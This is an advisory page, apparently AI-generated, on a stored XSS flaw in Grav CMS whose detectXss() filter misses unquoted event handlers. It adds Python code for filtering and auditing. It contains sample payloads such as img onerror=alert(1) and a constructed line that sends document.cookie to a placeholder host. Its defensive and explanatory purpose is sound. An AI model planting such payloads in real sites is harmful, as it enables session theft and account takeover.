CVE-2026-42612 Overview
CVE-2026-42612 is a stored Cross-Site Scripting (XSS) vulnerability in Grav, a file-based PHP content management system maintained by getgrav. The flaw exists in the detectXss() function, whose denylist-based filtering does not recognise HTML event-handler attributes written without quotes. An account with the Publisher role can store JavaScript that persists in page content and executes in the browser of every user who views it, administrators included. The vulnerability is fixed in Grav 2.0.0-beta.2.
Critical Impact
Authenticated publishers can store arbitrary JavaScript in Grav content, leading to session theft, account takeover of higher-privileged users, and pivoting through the administrative interface.
Affected Products
- Getgrav Grav versions prior to 2.0.0-beta.2
- Getgrav Grav 2.0.0-beta1
- Any Grav deployment whose admin/publishing interface is used by more than one user role, since a lower-privileged publisher can target higher-privileged viewers
Discovery Timeline
- 2026-05-11 - CVE-2026-42612 published to NVD
- 2026-05-12 - Last updated in NVD database
Technical Details for CVE-2026-42612
Vulnerability Analysis
The vulnerability is classified as Cross-Site Scripting [CWE-79]. Grav uses a function named detectXss() to inspect user-supplied HTML for dangerous constructs before storing or rendering it. The function operates as a denylist, matching known dangerous patterns such as quoted event handlers and javascript: URIs.
The denylist fails to normalize attribute syntax before matching. HTML tokenizers accept event handler attributes without surrounding quotes, so <img src=x onerror=alert(1)> and <img src="x" onerror="alert(1)"> produce the same attribute list in the browser. The detection routine anchors on the quote character and therefore does not match the unquoted form, allowing the payload to pass validation. Once stored, the page renderer emits the attacker-controlled markup verbatim, and the browser executes the JavaScript in the context of the Grav origin.
Exploitation requires a publisher-level account, so the attack is authenticated. The payload persists in Grav content files and triggers for every viewer, including administrators with higher privileges.
Root Cause
The root cause is incomplete input validation in detectXss(). The function relies on a denylist that does not account for the full lexical flexibility of the HTML attribute grammar. Unquoted event attributes are functionally equivalent to quoted ones in browsers, but they are not equivalent to the regex patterns used for detection.
Attack Vector
An attacker with publisher privileges submits content containing an unquoted event handler through the Grav editor or content API. The detectXss() filter approves the input, and Grav writes it to disk. When any user requests the affected page, the malicious script executes in the Grav origin, where it can read cookies that are not HttpOnly, issue authenticated requests to admin endpoints with any CSRF token the page exposes, and thereby escalate privileges.
// Security patch in system/src/Grav/Common/Media/Traits/MediaObjectTrait.php
// Restricts attribute names to safe identifiers and rejects event handlers,
// inline style, srcdoc, XML namespace, and form* attributes.
// isSafeAttributeName() is introduced by the same commit; its body is not shown here.
public function attribute($attribute = null, $value = '')
{
    if (empty($attribute) || !is_string($attribute)) {
        return $this;
    }

    if (!self::isSafeAttributeName($attribute)) {
        return $this;
    }

    $this->attributes[$attribute] = $value;

    return $this;
}
Source: Grav security commit 5a12f9b
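The bypass and the allowlist approach side by side, as an added example written for this page in Python. It is not Grav's code: the denylist regexes are a reconstruction of the weakness described above (Grav's real patterns may differ), and is_safe_attribute_name() mirrors only what the text says the patch rejects (on*, style, srcdoc, xmlns*, form*). The sample markup is constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample markup for this demonstration (not from any real incident).
QUOTED_PAYLOAD = '<img src="x" onerror="alert(1)">'
UNQUOTED_PAYLOAD = '<img src=x onerror=alert(1)>'
BENIGN_MARKUP = '<img src="/user/pages/01.home/logo.png" alt="logo" width="120">'

# 1. A denylist in the spirit of the flawed detectXss(): it recognises event
#    handlers only when the value is quoted. Illustrative reconstruction, not
#    Grav's actual regular expressions.
DENYLIST = (
    re.compile(r'on\w+\s*=\s*["\']', re.I),   # on...="..." or on...='...'
    re.compile(r'javascript\s*:', re.I),
    re.compile(r'<\s*script\b', re.I),
)

def denylist_detect(html):
    """True if any denylisted pattern matches the raw markup."""
    return any(p.search(html) for p in DENYLIST)

# 2. Tokenise with an HTML parser first, so quoted and unquoted values collapse
#    to the same (name, value) pairs, then judge attribute *names* with an
#    allowlist shaped like the isSafeAttributeName() idea: event handlers (on*),
#    style, srcdoc, XML namespaces (xmlns*) and form* are rejected regardless
#    of how the value was written. Names with non-identifier characters
#    (e.g. xlink:href) fail the shape check and are rejected too.
_NAME_SHAPE = re.compile(r'^[a-z][a-z0-9-]*$')
_URL_ATTRS = {'href', 'src', 'action'}

def is_safe_attribute_name(name):
    n = name.lower()
    if not _NAME_SHAPE.match(n):
        return False
    if n.startswith(('on', 'form', 'xmlns')):
        return False
    return n not in {'style', 'srcdoc'}

class _UnsafeAttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.unsafe = []   # (tag, attribute, value) for every rejected attribute

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not is_safe_attribute_name(name):
                self.unsafe.append((tag, name, value))
            elif (name in _URL_ATTRS and value is not None
                  and value.strip().lower().startswith('javascript:')):
                self.unsafe.append((tag, name, value))

def parsed_detect(html):
    """List of (tag, attribute, value) the allowlist rejects; [] when clean."""
    p = _UnsafeAttrCollector()
    p.feed(html)
    p.close()
    return p.unsafe

if __name__ == '__main__':
    for sample in (QUOTED_PAYLOAD, UNQUOTED_PAYLOAD, BENIGN_MARKUP):
        print(f'{sample!r}\n  denylist flags: {denylist_detect(sample)}'
              f'\n  parsed allowlist rejects: {parsed_detect(sample)}')
```

The quoted payload is caught by both routines; the unquoted one slips past the denylist but not the parser-plus-allowlist, because the decision is made on the attribute name after tokenisation rather than on the raw bytes.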
Detection Methods for CVE-2026-42612
Indicators of Compromise
- Grav content files (.md, .yaml, page data) containing unquoted HTML event handlers such as onerror=, onload=, or onmouseover= without surrounding quotes
- Unexpected <script>, <svg>, or <img> elements introduced by non-administrator accounts
- Outbound browser requests from administrator sessions to attacker-controlled domains shortly after viewing publisher-authored content
Detection Strategies
- Audit page content authored by publisher-role accounts for HTML event attributes and inline JavaScript
- Compare current page files against version control history to surface unauthorized markup insertions
- Inspect web server access logs for admin sessions issuing unusual POST requests immediately after rendering publisher content
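A content audit of the kind the first two strategies describe, as an added example in Python (not a Grav tool). It scans page files for the indicators listed above, reports file and line, and flags handlers written in the unquoted form that detectXss() missed. The page tree layout (user/pages with .md and .yaml files) is an assumption from the indicators section; the sample page is constructed. Treat hits as triage input, not a verdict: \bon[a-z]+= can also fire on prose.

```python
import re
from pathlib import Path

# Regexes for the indicators listed above. The handler pattern deliberately
# does not require a quote after '=', so onerror="x" and onerror=x both match.
INDICATORS = {
    'event_handler':  re.compile(r'\bon[a-z]+\s*=', re.I),
    'script_tag':     re.compile(r'<\s*script\b', re.I),
    'svg_tag':        re.compile(r'<\s*svg\b', re.I),
    'javascript_uri': re.compile(r'javascript\s*:', re.I),
}
# A handler whose value starts with anything but a quote: the form the
# detectXss() denylist let through.
_UNQUOTED_HANDLER = re.compile(r'\bon[a-z]+\s*=\s*[^\s"\'>]', re.I)

def scan_text(text, origin='<string>'):
    """One dict per hit: origin, line number, indicator kind, matched text,
    and whether an event handler used unquoted syntax."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in INDICATORS.items():
            for m in pattern.finditer(line):
                unquoted = (kind == 'event_handler'
                            and _UNQUOTED_HANDLER.match(line, m.start()) is not None)
                hits.append({'origin': origin, 'line': lineno, 'kind': kind,
                             'match': m.group(0), 'unquoted': unquoted})
    return hits

def scan_pages(root, suffixes=('.md', '.yaml')):
    """Walk a Grav user/pages tree (assumed layout) and scan every page file."""
    hits = []
    for path in sorted(Path(root).rglob('*')):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding='utf-8', errors='replace')
            hits.extend(scan_text(text, str(path)))
    return hits

# Constructed page file for the demonstration (not from a real compromised site).
SAMPLE_PAGE = """---
title: Quarterly update
---
# Quarterly update

Some normal text with a link to [docs](/docs).
<img src=x onerror=alert(document.cookie)>
<p onmouseover="fetch('https://example.invalid/?c='+document.cookie)">hover</p>
"""

if __name__ == '__main__':
    import sys
    hits = (scan_pages(sys.argv[1]) if len(sys.argv) > 1
            else scan_text(SAMPLE_PAGE, 'sample.md'))
    for h in hits:
        flag = ' [UNQUOTED]' if h['unquoted'] else ''
        print(f"{h['origin']}:{h['line']}: {h['kind']} {h['match']!r}{flag}")
```

Run it as scan.py user/pages to audit a live tree; without an argument it scans the embedded sample and reports the unquoted onerror on line 7 and the quoted onmouseover on line 8. Pair the output with git log or git blame on the same files to attribute each insertion to an account.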
Monitoring Recommendations
- Enable Content Security Policy (CSP) reporting to capture blocked inline-script execution attempts in Grav-rendered pages
- Correlate administrator actions with access logs: an admin session that performs a privileged change shortly after the same session (or client address) requested a publisher-authored page is the sequence this attack produces
- Alert on writes under user/pages/ that do not correspond to an expected admin-panel save; the PHP process owns the files, so attribute changes through Grav's own admin logs or version-control history rather than filesystem ownership
How to Mitigate CVE-2026-42612
Immediate Actions Required
- Upgrade Grav to version 2.0.0-beta.2 or later, which replaces the denylist logic and hardens attribute handling
- Review and revoke unnecessary publisher-role accounts and rotate session tokens for all privileged users
- Audit existing page content for malicious markup and remove or sanitize affected files before re-enabling the admin interface
Patch Information
The fix is delivered in commit 5a12f9be8314682c8713e569e330f11805d0a663 and tracked under GHSA-9695-8fr9-hw5q. The patch introduces an allowlist for attribute names through isSafeAttributeName(), rejecting on*, style, srcdoc, XML namespace, and form* attributes, and hardens archive extraction against Zip Slip.
Workarounds
- Restrict the publisher role to trusted users only until the upgrade is applied
- Deploy a strict Content Security Policy that disallows inline scripts and unsafe-eval to limit the impact of a stored XSS; roll it out in Content-Security-Policy-Report-Only mode first and confirm the admin panel still works before enforcing
- Place a web application firewall rule in front of Grav that blocks request bodies containing unquoted event handler attributes; treat this as a short-lived stopgap rather than a fix, since a request-body pattern is itself a denylist and the same lexical flexibility (case, whitespace, entity encoding) that defeated detectXss() applies to it
# Verify the installed Grav version and upgrade via the CLI
bin/grav --version
# gpm follows the release channel in system.gpm.releases ('stable' by default);
# a 2.0.0 beta is only offered when that setting is 'testing'
bin/gpm selfupgrade
# Confirm the post-upgrade version is 2.0.0-beta.2 or later
bin/grav --version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.